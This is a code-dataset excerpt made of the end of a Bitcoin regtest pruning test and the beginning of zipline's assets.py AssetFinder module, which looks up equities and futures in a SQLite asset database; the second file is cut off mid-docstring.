node = self.nodes[node_number] = start_node(node_number, self.options.tmpdir, ["-debug=0","-prune=1"], timewait=900)
assert_equal(node.getblockcount(), 995)
def height(index):
if use_timestamp:
return node.getblockheader(node.getblockhash(index))["time"] + RESCAN_WINDOW
else:
return index
def prune(index, expected_ret=None):
ret = node.pruneblockchain(height(index))
# Check the return value. When use_timestamp is True, just check
# that the return value is less than or equal to the expected
# value, because when more than one block is generated per second,
# a timestamp will not be granular enough to uniquely identify an
# individual block.
if expected_ret is None:
expected_ret = index
if use_timestamp:
assert_greater_than(ret, 0)
assert_greater_than(expected_ret + 1, ret)
else:
assert_equal(ret, expected_ret)
def has_block(index):
return os.path.isfile(self.options.tmpdir + "/node{}/regtest/blocks/blk{:05}.dat".format(node_number, index))
# should not prune because chain tip of node 3 (995) < PruneAfterHeight (1000)
assert_raises_message(JSONRPCException, "Blockchain is too short for pruning", node.pruneblockchain, height(500))
# mine 6 blocks so we are at height 1001 (i.e., above PruneAfterHeight)
node.generate(6)
assert_equal(node.getblockchaininfo()["blocks"], 1001)
# negative heights should raise an exception
assert_raises_message(JSONRPCException, "Negative", node.pruneblockchain, -10)
# height=100 too low to prune first block file so this is a no-op
prune(100)
if not has_block(0):
raise AssertionError("blk00000.dat is missing when should still be there")
# Does nothing
node.pruneblockchain(height(0))
if not has_block(0):
raise AssertionError("blk00000.dat is missing when should still be there")
# height=500 should prune first file
prune(500)
if has_block(0):
raise AssertionError("blk00000.dat is still there, should be pruned by now")
if not has_block(1):
raise AssertionError("blk00001.dat is missing when should still be there")
# height=650 should prune second file
prune(650)
if has_block(1):
raise AssertionError("blk00001.dat is still there, should be pruned by now")
# height=1000 should not prune anything more, because tip-288 is in blk00002.dat.
prune(1000, 1001 - MIN_BLOCKS_TO_KEEP)
if not has_block(2):
raise AssertionError("blk00002.dat is still there, should be pruned by now")
# advance the tip so blk00002.dat and blk00003.dat can be pruned (the last 288 blocks should now be in blk00004.dat)
node.generate(288)
prune(1000)
if has_block(2):
raise AssertionError("blk00002.dat is still there, should be pruned by now")
if has_block(3):
raise AssertionError("blk00003.dat is still there, should be pruned by now")
# stop node, start back up with auto-prune at 550MB, make sure still runs
self.stop_node(node_number)
self.nodes[node_number] = start_node(node_number, self.options.tmpdir, ["-debug=0","-prune=550"], timewait=900)
print("Success")
def wallet_test(self):
# check that the pruning node's wallet is still in good shape
print("Stop and start pruning node to trigger wallet rescan")
try:
self.stop_node(2)
start_node(2, self.options.tmpdir, ["-debug=1","-prune=550"])
print("Success")
except Exception as detail:
raise AssertionError("Wallet test: unable to re-start the pruning node")
# check that wallet loads loads successfully when restarting a pruned node after IBD.
# this was reported to fail in #7494.
print ("Syncing node 5 to test wallet")
connect_nodes(self.nodes[0], 5)
nds = [self.nodes[0], self.nodes[5]]
sync_blocks(nds, wait=5, timeout=300)
try:
self.stop_node(5) #stop and start to trigger rescan
start_node(5, self.options.tmpdir, ["-debug=1","-prune=550"])
print ("Success")
except Exception as detail:
raise AssertionError("Wallet test: unable to re-start node5")
def run_test(self):
print("Warning! This test requires 4GB of disk space and takes over 30 mins (up to 2 hours)")
print("Mining a big blockchain of 995 blocks")
self.create_big_chain()
# Chain diagram key:
# * blocks on main chain
# +,&,$,@ blocks on other forks
# X invalidated block
# N1 Node 1
#
# Start by mining a simple chain that all nodes have
# N0=N1=N2 **...*(995)
# stop manual-pruning node with 995 blocks
self.stop_node(3)
self.stop_node(4)
print("Check that we haven't started pruning yet because we're below PruneAfterHeight")
self.test_height_min()
# Extend this chain past the PruneAfterHeight
# N0=N1=N2 **...*(1020)
print("Check that we'll exceed disk space target if we have a very high stale block rate")
self.create_chain_with_staleblocks()
# Disconnect N0
# And mine a 24 block chain on N1 and a separate 25 block chain on N0
# N1=N2 **...*+...+(1044)
# N0 **...**...**(1045)
#
# reconnect nodes causing reorg on N1 and N2
# N1=N2 **...*(1020) *...**(1045)
# \
# +...+(1044)
#
# repeat this process until you have 12 stale forks hanging off the
# main chain on N1 and N2
# N0 *************************...***************************(1320)
#
# N1=N2 **...*(1020) *...**(1045) *.. ..**(1295) *...**(1320)
# \ \ \
# +...+(1044) &.. $...$(1319)
# Save some current chain state for later use
self.mainchainheight = self.nodes[2].getblockcount() #1320
self.mainchainhash2 = self.nodes[2].getblockhash(self.mainchainheight)
print("Check that we can survive a 288 block reorg still")
(self.forkheight,self.forkhash) = self.reorg_test() #(1033, )
# Now create a 288 block reorg by mining a longer chain on N1
# First disconnect N1
# Then invalidate 1033 on main chain and 1032 on fork so height is 1032 on main chain
# N1 **...*(1020) **...**(1032)X..
# \
# ++...+(1031)X..
#
# Now mine 300 more blocks on N1
# N1 **...*(1020) **...**(1032) @@...@(1332)
# \ \
# \ X...
# \ \
# ++...+(1031)X.. ..
#
# Reconnect nodes and mine 220 more blocks on N1
# N1 **...*(1020) **...**(1032) @@...@@@(1552)
# \ \
# \ X...
# \ \
# ++...+(1031)X.. ..
#
# N2 **...*(1020) **...**(1032) @@...@@@(1552)
# \ \
# \ *...**(1320)
# \ \
# ++...++(1044) ..
#
# N0 ********************(1032) @@...@@@(1552)
# \
# *...**(1320)
print("Test that we can rerequest a block we previously pruned if needed for a reorg")
self.reorg_back()
# Verify that N2 still has block 1033 on current chain (@), but not on main chain (*)
# Invalidate 1033 on current chain (@) on N2 and we should be able to reorg to
# original main chain (*), but will require redownload of some blocks
# In order to have a peer we think we can download from, must also perform this invalidation
# on N0 and mine a new longest chain to trigger.
# Final result:
# N0 ********************(1032) **...****(1553)
# \
# X@...@@@(1552)
#
# N2 **...*(1020) **...**(1032) **...****(1553)
# \ \
# \ X@...@@@(1552)
# \
# +..
#
# N1 doesn't change because 1033 on main chain (*) is invalid
print("Test manual pruning with block indices")
self.manual_test(3, use_timestamp=False)
print("Test manual pruning with timestamps")
self.manual_test(4, use_timestamp=True)
print("Test wallet re-scan")
self.wallet_test()
print("Done")
if __name__ == '__main__':
PruneTest().main()
| 47.284768 | 167 | 0.603455 |
ace8d02dd9a9e65bfbfbae438c3654b0674bb2ab | 46,983 | py | Python | zipline/assets/assets.py | hebpmo/zipline | 396469b29e7e0daea4fe1e8a1c18f6c7eeb92780 | [
"Apache-2.0"
] | 4 | 2018-11-17T20:04:53.000Z | 2021-12-10T14:47:30.000Z | zipline/assets/assets.py | t330883522/zipline | 396469b29e7e0daea4fe1e8a1c18f6c7eeb92780 | [
"Apache-2.0"
] | null | null | null | zipline/assets/assets.py | t330883522/zipline | 396469b29e7e0daea4fe1e8a1c18f6c7eeb92780 | [
"Apache-2.0"
] | 3 | 2018-11-17T20:04:50.000Z | 2020-03-01T11:11:41.000Z | # Copyright 2016 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABCMeta
import array
import binascii
from collections import deque, namedtuple
from functools import partial
from numbers import Integral
from operator import itemgetter, attrgetter
import struct
from logbook import Logger
import numpy as np
import pandas as pd
from pandas import isnull
from six import with_metaclass, string_types, viewkeys, iteritems
import sqlalchemy as sa
from toolz import (
compose,
concat,
concatv,
curry,
merge,
partition_all,
sliding_window,
valmap,
)
from toolz.curried import operator as op
from zipline.errors import (
EquitiesNotFound,
FutureContractsNotFound,
MapAssetIdentifierIndexError,
MultipleSymbolsFound,
MultipleValuesFoundForField,
MultipleValuesFoundForSid,
NoValueForSid,
ValueNotFoundForField,
SidsNotFound,
SymbolNotFound,
)
from . import (
Asset, Equity, Future,
)
from . continuous_futures import (
ADJUSTMENT_STYLES,
CHAIN_PREDICATES,
ContinuousFuture,
OrderedContracts,
)
from .asset_writer import (
check_version_info,
split_delimited_symbol,
asset_db_table_names,
symbol_columns,
SQLITE_MAX_VARIABLE_NUMBER,
)
from .asset_db_schema import (
ASSET_DB_VERSION
)
from zipline.utils.functional import invert
from zipline.utils.memoize import lazyval
from zipline.utils.numpy_utils import as_column
from zipline.utils.preprocess import preprocess
from zipline.utils.sqlite_utils import group_into_chunks, coerce_string_to_eng
log = Logger('assets.py')
# A set of fields that need to be converted to strings before building an
# Asset to avoid unicode fields
_asset_str_fields = frozenset({
'symbol',
'asset_name',
'exchange',
})
# A set of fields that need to be converted to timestamps in UTC
_asset_timestamp_fields = frozenset({
'start_date',
'end_date',
'first_traded',
'notice_date',
'expiration_date',
'auto_close_date',
})
OwnershipPeriod = namedtuple('OwnershipPeriod', 'start end sid value')
def merge_ownership_periods(mappings):
"""
Given a dict of mappings where the values are lists of
OwnershipPeriod objects, returns a dict with the same structure with
new OwnershipPeriod objects adjusted so that the periods have no
gaps.
Orders the periods chronologically, and pushes forward the end date
of each period to match the start date of the following period. The
end date of the last period pushed forward to the max Timestamp.
"""
return valmap(
lambda v: tuple(
OwnershipPeriod(
a.start,
b.start,
a.sid,
a.value,
) for a, b in sliding_window(
2,
concatv(
sorted(v),
# concat with a fake ownership object to make the last
# end date be max timestamp
[OwnershipPeriod(
pd.Timestamp.max.tz_localize('utc'),
None,
None,
None,
)],
),
)
),
mappings,
)
def build_ownership_map(table, key_from_row, value_from_row):
"""
Builds a dict mapping to lists of OwnershipPeriods, from a db table.
"""
rows = sa.select(table.c).execute().fetchall()
mappings = {}
for row in rows:
mappings.setdefault(
key_from_row(row),
[],
).append(
OwnershipPeriod(
pd.Timestamp(row.start_date, unit='ns', tz='utc'),
pd.Timestamp(row.end_date, unit='ns', tz='utc'),
row.sid,
value_from_row(row),
),
)
return merge_ownership_periods(mappings)
@curry
def _filter_kwargs(names, dict_):
"""Filter out kwargs from a dictionary.
Parameters
----------
names : set[str]
The names to select from ``dict_``.
dict_ : dict[str, any]
The dictionary to select from.
Returns
-------
kwargs : dict[str, any]
``dict_`` where the keys intersect with ``names`` and the values are
not None.
"""
return {k: v for k, v in dict_.items() if k in names and v is not None}
_filter_future_kwargs = _filter_kwargs(Future._kwargnames)
_filter_equity_kwargs = _filter_kwargs(Equity._kwargnames)
def _convert_asset_timestamp_fields(dict_):
"""
Takes in a dict of Asset init args and converts dates to pd.Timestamps
"""
for key in _asset_timestamp_fields & viewkeys(dict_):
value = pd.Timestamp(dict_[key], tz='UTC')
dict_[key] = None if isnull(value) else value
return dict_
SID_TYPE_IDS = {
# Asset would be 0,
ContinuousFuture: 1,
}
CONTINUOUS_FUTURE_ROLL_STYLE_IDS = {
'calendar': 0,
'volume': 1,
}
CONTINUOUS_FUTURE_ADJUSTMENT_STYLE_IDS = {
None: 0,
'div': 1,
'add': 2,
}
def _encode_continuous_future_sid(root_symbol,
offset,
roll_style,
adjustment_style):
s = struct.Struct("B 2B B B B 2B")
# B - sid type
# 2B - root symbol
# B - offset (could be packed smaller since offsets of greater than 12 are
# probably unneeded.)
# B - roll type
# B - adjustment
# 2B - empty space left for parameterized roll types
# The root symbol currently supports 2 characters. If 3 char root symbols
# are needed, the size of the root symbol does not need to change, however
# writing the string directly will need to change to a scheme of writing
# the A-Z values in 5-bit chunks.
a = array.array('B', [0] * s.size)
rs = bytearray(root_symbol, 'ascii')
values = (SID_TYPE_IDS[ContinuousFuture],
rs[0],
rs[1],
offset,
CONTINUOUS_FUTURE_ROLL_STYLE_IDS[roll_style],
CONTINUOUS_FUTURE_ADJUSTMENT_STYLE_IDS[adjustment_style],
0, 0)
s.pack_into(a, 0, *values)
return int(binascii.hexlify(a), 16)
class AssetFinder(object):
"""
An AssetFinder is an interface to a database of Asset metadata written by
an ``AssetDBWriter``.
This class provides methods for looking up assets by unique integer id or
by symbol. For historical reasons, we refer to these unique ids as 'sids'.
Parameters
----------
engine : str or SQLAlchemy.engine
An engine with a connection to the asset database to use, or a string
that can be parsed by SQLAlchemy as a URI.
future_chain_predicates : dict
A dict mapping future root symbol to a predicate function which accepts
a contract as a parameter and returns whether or not the contract should be
included in the chain.
See Also
--------
:class:`zipline.assets.AssetDBWriter`
"""
# Token used as a substitute for pickling objects that contain a
# reference to an AssetFinder.
PERSISTENT_TOKEN = "<AssetFinder>"
@preprocess(engine=coerce_string_to_eng(require_exists=True))
def __init__(self, engine, future_chain_predicates=CHAIN_PREDICATES):
self.engine = engine
metadata = sa.MetaData(bind=engine)
metadata.reflect(only=asset_db_table_names)
for table_name in asset_db_table_names:
setattr(self, table_name, metadata.tables[table_name])
# Check the version info of the db for compatibility
check_version_info(engine, self.version_info, ASSET_DB_VERSION)
# Cache for lookup of assets by sid, the objects in the asset lookup
# may be shared with the results from equity and future lookup caches.
#
# The top level cache exists to minimize lookups on the asset type
# routing.
#
# The caches are read through, i.e. accessing an asset through
# retrieve_asset will populate the cache on first retrieval.
self._caches = (self._asset_cache, self._asset_type_cache) = {}, {}
self._future_chain_predicates = future_chain_predicates \
if future_chain_predicates is not None else {}
self._ordered_contracts = {}
# Populated on first call to `lifetimes`.
self._asset_lifetimes = None
def _reset_caches(self):
"""
Reset our asset caches.
You probably shouldn't call this method.
"""
# This method exists as a workaround for the in-place mutating behavior
# of `TradingAlgorithm._write_and_map_id_index_to_sids`. No one else
# should be calling this.
for cache in self._caches:
cache.clear()
self.reload_symbol_maps()
def reload_symbol_maps(self):
"""Clear the in memory symbol lookup maps.
This will make any changes to the underlying db available to the
symbol maps.
"""
# clear the lazyval caches, the next access will requery
try:
del type(self).symbol_ownership_map[self]
except KeyError:
pass
try:
del type(self).fuzzy_symbol_ownership_map[self]
except KeyError:
pass
try:
del type(self).equity_supplementary_map[self]
except KeyError:
pass
try:
del type(self).equity_supplementary_map_by_sid[self]
except KeyError:
pass
@lazyval
def symbol_ownership_map(self):
return build_ownership_map(
table=self.equity_symbol_mappings,
key_from_row=(
lambda row: (row.company_symbol, row.share_class_symbol)
),
value_from_row=lambda row: row.symbol,
)
@lazyval
def fuzzy_symbol_ownership_map(self):
fuzzy_mappings = {}
for (cs, scs), owners in iteritems(self.symbol_ownership_map):
fuzzy_owners = fuzzy_mappings.setdefault(
cs + scs,
[],
)
fuzzy_owners.extend(owners)
fuzzy_owners.sort()
return fuzzy_mappings
@lazyval
def equity_supplementary_map(self):
return build_ownership_map(
table=self.equity_supplementary_mappings,
key_from_row=lambda row: (row.field, row.value),
value_from_row=lambda row: row.value,
)
@lazyval
def equity_supplementary_map_by_sid(self):
return build_ownership_map(
table=self.equity_supplementary_mappings,
key_from_row=lambda row: (row.field, row.sid),
value_from_row=lambda row: row.value,
)
def lookup_asset_types(self, sids):
"""
Retrieve asset types for a list of sids.
Parameters
----------
sids : list[int]
Returns
-------
types : dict[sid -> str or None]
Asset types for the provided sids.
"""
found = {}
missing = set()
for sid in sids:
try:
found[sid] = self._asset_type_cache[sid]
except KeyError:
missing.add(sid)
if not missing:
return found
router_cols = self.asset_router.c
for assets in group_into_chunks(missing):
query = sa.select((router_cols.sid, router_cols.asset_type)).where(
self.asset_router.c.sid.in_(map(int, assets))
)
for sid, type_ in query.execute().fetchall():
missing.remove(sid)
found[sid] = self._asset_type_cache[sid] = type_
for sid in missing:
found[sid] = self._asset_type_cache[sid] = None
return found
def group_by_type(self, sids):
"""
Group a list of sids by asset type.
Parameters
----------
sids : list[int]
Returns
-------
types : dict[str or None -> list[int]]
A dict mapping unique asset types to lists of sids drawn from sids.
If we fail to look up an asset, we assign it a key of None.
"""
return invert(self.lookup_asset_types(sids))
def retrieve_asset(self, sid, default_none=False):
"""
Retrieve the Asset for a given sid.
"""
try:
asset = self._asset_cache[sid]
if asset is None and not default_none:
raise SidsNotFound(sids=[sid])
return asset
except KeyError:
return self.retrieve_all((sid,), default_none=default_none)[0]
def retrieve_all(self, sids, default_none=False):
"""
Retrieve all assets in `sids`.
Parameters
----------
sids : iterable of int
Assets to retrieve.
default_none : bool
If True, return None for failed lookups.
If False, raise `SidsNotFound`.
Returns
-------
assets : list[Asset or None]
A list of the same length as `sids` containing Assets (or Nones)
corresponding to the requested sids.
Raises
------
SidsNotFound
When a requested sid is not found and default_none=False.
"""
hits, missing, failures = {}, set(), []
for sid in sids:
try:
asset = self._asset_cache[sid]
if not default_none and asset is None:
# Bail early if we've already cached that we don't know
# about an asset.
raise SidsNotFound(sids=[sid])
hits[sid] = asset
except KeyError:
missing.add(sid)
# All requests were cache hits. Return requested sids in order.
if not missing:
return [hits[sid] for sid in sids]
update_hits = hits.update
# Look up cache misses by type.
type_to_assets = self.group_by_type(missing)
# Handle failures
failures = {failure: None for failure in type_to_assets.pop(None, ())}
update_hits(failures)
self._asset_cache.update(failures)
if failures and not default_none:
raise SidsNotFound(sids=list(failures))
# We don't update the asset cache here because it should already be
# updated by `self.retrieve_equities`.
update_hits(self.retrieve_equities(type_to_assets.pop('equity', ())))
update_hits(
self.retrieve_futures_contracts(type_to_assets.pop('future', ()))
)
# We shouldn't know about any other asset types.
if type_to_assets:
raise AssertionError(
"Found asset types: %s" % list(type_to_assets.keys())
)
return [hits[sid] for sid in sids]
def retrieve_equities(self, sids):
"""
Retrieve Equity objects for a list of sids.
Users generally shouldn't need to this method (instead, they should
prefer the more general/friendly `retrieve_assets`), but it has a
documented interface and tests because it's used upstream.
Parameters
----------
sids : iterable[int]
Returns
-------
equities : dict[int -> Equity]
Raises
------
EquitiesNotFound
When any requested asset isn't found.
"""
return self._retrieve_assets(sids, self.equities, Equity)
def _retrieve_equity(self, sid):
return self.retrieve_equities((sid,))[sid]
def retrieve_futures_contracts(self, sids):
"""
Retrieve Future objects for an iterable of sids.
Users generally shouldn't need to this method (instead, they should
prefer the more general/friendly `retrieve_assets`), but it has a
documented interface and tests because it's used upstream.
Parameters
----------
sids : iterable[int]
Returns
-------
equities : dict[int -> Equity]
Raises
------
EquitiesNotFound
When any requested asset isn't found.
"""
return self._retrieve_assets(sids, self.futures_contracts, Future)
@staticmethod
def _select_assets_by_sid(asset_tbl, sids):
return sa.select([asset_tbl]).where(
asset_tbl.c.sid.in_(map(int, sids))
)
@staticmethod
def _select_asset_by_symbol(asset_tbl, symbol):
return sa.select([asset_tbl]).where(asset_tbl.c.symbol == symbol)
def _select_most_recent_symbols_chunk(self, sid_group):
"""Retrieve the most recent symbol for a set of sids.
Parameters
----------
sid_group : iterable[int]
The sids to lookup. The length of this sequence must be less than
or equal to SQLITE_MAX_VARIABLE_NUMBER because the sids will be
passed in as sql bind params.
Returns
-------
sel : Selectable
The sqlalchemy selectable that will query for the most recent
symbol for each sid.
Notes
-----
This is implemented as an inner select of the columns of interest
ordered by the end date of the (sid, symbol) mapping. We then group
that inner select on the sid with no aggregations to select the last
row per group which gives us the most recently active symbol for all
of the sids.
"""
symbol_cols = self.equity_symbol_mappings.c
inner = sa.select(
(symbol_cols.sid,) +
tuple(map(
op.getitem(symbol_cols),
symbol_columns,
)),
).where(
symbol_cols.sid.in_(map(int, sid_group)),
).order_by(
symbol_cols.end_date.asc(),
)
return sa.select(inner.c).group_by(inner.c.sid)
def _lookup_most_recent_symbols(self, sids):
symbols = {
row.sid: {c: row[c] for c in symbol_columns}
for row in concat(
self.engine.execute(
self._select_most_recent_symbols_chunk(sid_group),
).fetchall()
for sid_group in partition_all(
SQLITE_MAX_VARIABLE_NUMBER,
sids
)
)
}
if len(symbols) != len(sids):
raise EquitiesNotFound(
sids=set(sids) - set(symbols),
plural=True,
)
return symbols
def _retrieve_asset_dicts(self, sids, asset_tbl, querying_equities):
if not sids:
return
if querying_equities:
def mkdict(row,
symbols=self._lookup_most_recent_symbols(sids)):
return merge(row, symbols[row['sid']])
else:
mkdict = dict
for assets in group_into_chunks(sids):
# Load misses from the db.
query = self._select_assets_by_sid(asset_tbl, assets)
for row in query.execute().fetchall():
yield _convert_asset_timestamp_fields(mkdict(row))
def _retrieve_assets(self, sids, asset_tbl, asset_type):
"""
Internal function for loading assets from a table.
This should be the only method of `AssetFinder` that writes Assets into
self._asset_cache.
Parameters
---------
sids : iterable of int
Asset ids to look up.
asset_tbl : sqlalchemy.Table
Table from which to query assets.
asset_type : type
Type of asset to be constructed.
Returns
-------
assets : dict[int -> Asset]
Dict mapping requested sids to the retrieved assets.
"""
# Fastpath for empty request.
if not sids:
return {}
cache = self._asset_cache
hits = {}
querying_equities = issubclass(asset_type, Equity)
filter_kwargs = (
_filter_equity_kwargs
if querying_equities else
_filter_future_kwargs
)
rows = self._retrieve_asset_dicts(sids, asset_tbl, querying_equities)
for row in rows:
sid = row['sid']
asset = asset_type(**filter_kwargs(row))
hits[sid] = cache[sid] = asset
# If we get here, it means something in our code thought that a
# particular sid was an equity/future and called this function with a
# concrete type, but we couldn't actually resolve the asset. This is
# an error in our code, not a user-input error.
misses = tuple(set(sids) - viewkeys(hits))
if misses:
if querying_equities:
raise EquitiesNotFound(sids=misses)
else:
raise FutureContractsNotFound(sids=misses)
return hits
def _lookup_symbol_strict(self, symbol, as_of_date):
# split the symbol into the components, if there are no
# company/share class parts then share_class_symbol will be empty
company_symbol, share_class_symbol = split_delimited_symbol(symbol)
try:
owners = self.symbol_ownership_map[
company_symbol,
share_class_symbol,
]
assert owners, 'empty owners list for %r' % symbol
except KeyError:
# no equity has ever held this symbol
raise SymbolNotFound(symbol=symbol)
if not as_of_date:
if len(owners) > 1:
# more than one equity has held this ticker, this is ambigious
# without the date
raise MultipleSymbolsFound(
symbol=symbol,
options=set(map(
compose(self.retrieve_asset, attrgetter('sid')),
owners,
)),
)
# exactly one equity has ever held this symbol, we may resolve
# without the date
return self.retrieve_asset(owners[0].sid)
for start, end, sid, _ in owners:
if start <= as_of_date < end:
# find the equity that owned it on the given asof date
return self.retrieve_asset(sid)
# no equity held the ticker on the given asof date
raise SymbolNotFound(symbol=symbol)
def _lookup_symbol_fuzzy(self, symbol, as_of_date):
symbol = symbol.upper()
company_symbol, share_class_symbol = split_delimited_symbol(symbol)
try:
owners = self.fuzzy_symbol_ownership_map[
company_symbol + share_class_symbol
]
assert owners, 'empty owners list for %r' % symbol
except KeyError:
# no equity has ever held a symbol matching the fuzzy symbol
raise SymbolNotFound(symbol=symbol)
if not as_of_date:
if len(owners) == 1:
# only one valid match
return self.retrieve_asset(owners[0].sid)
options = []
for _, _, sid, sym in owners:
if sym == symbol:
# there are multiple options, look for exact matches
options.append(self.retrieve_asset(sid))
if len(options) == 1:
# there was only one exact match
return options[0]
# there are more than one exact match for this fuzzy symbol
raise MultipleSymbolsFound(
symbol=symbol,
options=set(options),
)
options = {}
for start, end, sid, sym in owners:
if start <= as_of_date < end:
# see which fuzzy symbols were owned on the asof date.
options[sid] = sym
if not options:
# no equity owned the fuzzy symbol on the date requested
raise SymbolNotFound(symbol=symbol)
sid_keys = list(options.keys())
# If there was only one owner, or there is a fuzzy and non-fuzzy which
# map to the same sid, return it.
if len(options) == 1:
return self.retrieve_asset(sid_keys[0])
for sid, sym in options.items():
# Possible to have a scenario where multiple fuzzy matches have the
# same date. Want to find the one where symbol and share class
# match.
if (company_symbol, share_class_symbol) == \
split_delimited_symbol(sym):
return self.retrieve_asset(sid)
# multiple equities held tickers matching the fuzzy ticker but
# there are no exact matches
raise MultipleSymbolsFound(
symbol=symbol,
options=[self.retrieve_asset(s) for s in sid_keys],
)
def lookup_symbol(self, symbol, as_of_date, fuzzy=False):
"""Lookup an equity by symbol.
Parameters
----------
symbol : str
The ticker symbol to resolve.
as_of_date : datetime or None
Look up the last owner of this symbol as of this datetime.
If ``as_of_date`` is None, then this can only resolve the equity
if exactly one equity has ever owned the ticker.
fuzzy : bool, optional
Should fuzzy symbol matching be used? Fuzzy symbol matching
attempts to resolve differences in representations for
shareclasses. For example, some people may represent the ``A``
shareclass of ``BRK`` as ``BRK.A``, where others could write
``BRK_A``.
Returns
-------
equity : Equity
The equity that held ``symbol`` on the given ``as_of_date``, or the
only equity to hold ``symbol`` if ``as_of_date`` is None.
Raises
------
SymbolNotFound
Raised when no equity has ever held the given symbol.
MultipleSymbolsFound
Raised when no ``as_of_date`` is given and more than one equity
has held ``symbol``. This is also raised when ``fuzzy=True`` and
there are multiple candidates for the given ``symbol`` on the
``as_of_date``.
"""
if symbol is None:
raise TypeError("Cannot lookup asset for symbol of None for "
"as of date %s." % as_of_date)
if fuzzy:
return self._lookup_symbol_fuzzy(symbol, as_of_date)
return self._lookup_symbol_strict(symbol, as_of_date)
def lookup_symbols(self, symbols, as_of_date, fuzzy=False):
"""
Lookup a list of equities by symbol.
Equivalent to::
[finder.lookup_symbol(s, as_of, fuzzy) for s in symbols]
but potentially faster because repeated lookups are memoized.
Parameters
----------
symbols : sequence[str]
Sequence of ticker symbols to resolve.
as_of_date : pd.Timestamp
Forwarded to ``lookup_symbol``.
fuzzy : bool, optional
Forwarded to ``lookup_symbol``.
Returns
-------
equities : list[Equity]
"""
memo = {}
out = []
append_output = out.append
for sym in symbols:
if sym in memo:
append_output(memo[sym])
else:
equity = memo[sym] = self.lookup_symbol(sym, as_of_date, fuzzy)
append_output(equity)
return out
def lookup_future_symbol(self, symbol):
"""Lookup a future contract by symbol.
Parameters
----------
symbol : str
The symbol of the desired contract.
Returns
-------
future : Future
The future contract referenced by ``symbol``.
Raises
------
SymbolNotFound
Raised when no contract named 'symbol' is found.
"""
data = self._select_asset_by_symbol(self.futures_contracts, symbol)\
.execute().fetchone()
# If no data found, raise an exception
if not data:
raise SymbolNotFound(symbol=symbol)
return self.retrieve_asset(data['sid'])
def lookup_by_supplementary_field(self, field_name, value, as_of_date):
try:
owners = self.equity_supplementary_map[
field_name,
value,
]
assert owners, 'empty owners list for %r' % (field_name, value)
except KeyError:
# no equity has ever held this value
raise ValueNotFoundForField(field=field_name, value=value)
if not as_of_date:
if len(owners) > 1:
# more than one equity has held this value, this is ambigious
# without the date
raise MultipleValuesFoundForField(
field=field_name,
value=value,
options=set(map(
compose(self.retrieve_asset, attrgetter('sid')),
owners,
)),
)
# exactly one equity has ever held this value, we may resolve
# without the date
return self.retrieve_asset(owners[0].sid)
for start, end, sid, _ in owners:
if start <= as_of_date < end:
# find the equity that owned it on the given asof date
return self.retrieve_asset(sid)
# no equity held the value on the given asof date
raise ValueNotFoundForField(field=field_name, value=value)
def get_supplementary_field(
self,
sid,
field_name,
as_of_date,
):
"""Get the value of a supplementary field for an asset.
Parameters
----------
sid : int
The sid of the asset to query.
field_name : str
Name of the supplementary field.
as_of_date : pd.Timestamp, None
The last known value on this date is returned. If None, a
value is returned only if we've only ever had one value for
this sid. If None and we've had multiple values,
MultipleValuesFoundForSid is raised.
Raises
------
NoValueForSid
If we have no values for this asset, or no values was known
on this as_of_date.
MultipleValuesFoundForSid
If we have had multiple values for this asset over time, and
None was passed for as_of_date.
"""
try:
periods = self.equity_supplementary_map_by_sid[
field_name,
sid,
]
assert periods, 'empty periods list for %r' % (field_name, sid)
except KeyError:
raise NoValueForSid(field=field_name, sid=sid)
if not as_of_date:
if len(periods) > 1:
# This equity has held more than one value, this is ambigious
# without the date
raise MultipleValuesFoundForSid(
field=field_name,
sid=sid,
options={p.value for p in periods},
)
# this equity has only ever held this value, we may resolve
# without the date
return periods[0].value
for start, end, _, value in periods:
if start <= as_of_date < end:
return value
# Could not find a value for this sid on the as_of_date.
raise NoValueForSid(field=field_name, sid=sid)
def _get_contract_sids(self, root_symbol):
fc_cols = self.futures_contracts.c
return [r.sid for r in
list(sa.select((fc_cols.sid,)).where(
(fc_cols.root_symbol == root_symbol) &
(fc_cols.start_date != pd.NaT.value)).order_by(
fc_cols.sid).execute().fetchall())]
def _get_root_symbol_exchange(self, root_symbol):
fc_cols = self.futures_root_symbols.c
fields = (fc_cols.exchange,)
exchange = sa.select(fields).where(
fc_cols.root_symbol == root_symbol).execute().scalar()
if exchange is not None:
return exchange
else:
raise SymbolNotFound(symbol=root_symbol)
def get_ordered_contracts(self, root_symbol):
try:
return self._ordered_contracts[root_symbol]
except KeyError:
contract_sids = self._get_contract_sids(root_symbol)
contracts = deque(self.retrieve_all(contract_sids))
chain_predicate = self._future_chain_predicates.get(root_symbol,
None)
oc = OrderedContracts(root_symbol, contracts, chain_predicate)
self._ordered_contracts[root_symbol] = oc
return oc
def create_continuous_future(self,
root_symbol,
offset,
roll_style,
adjustment):
if adjustment not in ADJUSTMENT_STYLES:
raise ValueError(
'Invalid adjustment style {!r}. Allowed adjustment styles are '
'{}.'.format(adjustment, list(ADJUSTMENT_STYLES))
)
oc = self.get_ordered_contracts(root_symbol)
exchange = self._get_root_symbol_exchange(root_symbol)
sid = _encode_continuous_future_sid(root_symbol, offset,
roll_style,
None)
mul_sid = _encode_continuous_future_sid(root_symbol, offset,
roll_style,
'div')
add_sid = _encode_continuous_future_sid(root_symbol, offset,
roll_style,
'add')
cf_template = partial(
ContinuousFuture,
root_symbol=root_symbol,
offset=offset,
roll_style=roll_style,
start_date=oc.start_date,
end_date=oc.end_date,
exchange=exchange,
)
cf = cf_template(sid=sid)
mul_cf = cf_template(sid=mul_sid, adjustment='mul')
add_cf = cf_template(sid=add_sid, adjustment='add')
self._asset_cache[cf.sid] = cf
self._asset_cache[mul_cf.sid] = mul_cf
self._asset_cache[add_cf.sid] = add_cf
return {None: cf, 'mul': mul_cf, 'add': add_cf}[adjustment]
def _make_sids(tblattr):
def _(self):
return tuple(map(
itemgetter('sid'),
sa.select((
getattr(self, tblattr).c.sid,
)).execute().fetchall(),
))
return _
sids = property(
_make_sids('asset_router'),
doc='All the sids in the asset finder.',
)
equities_sids = property(
_make_sids('equities'),
doc='All of the sids for equities in the asset finder.',
)
futures_sids = property(
_make_sids('futures_contracts'),
doc='All of the sids for futures consracts in the asset finder.',
)
del _make_sids
@lazyval
def _symbol_lookups(self):
"""
An iterable of symbol lookup functions to use with ``lookup_generic``
Attempts equities lookup, then futures.
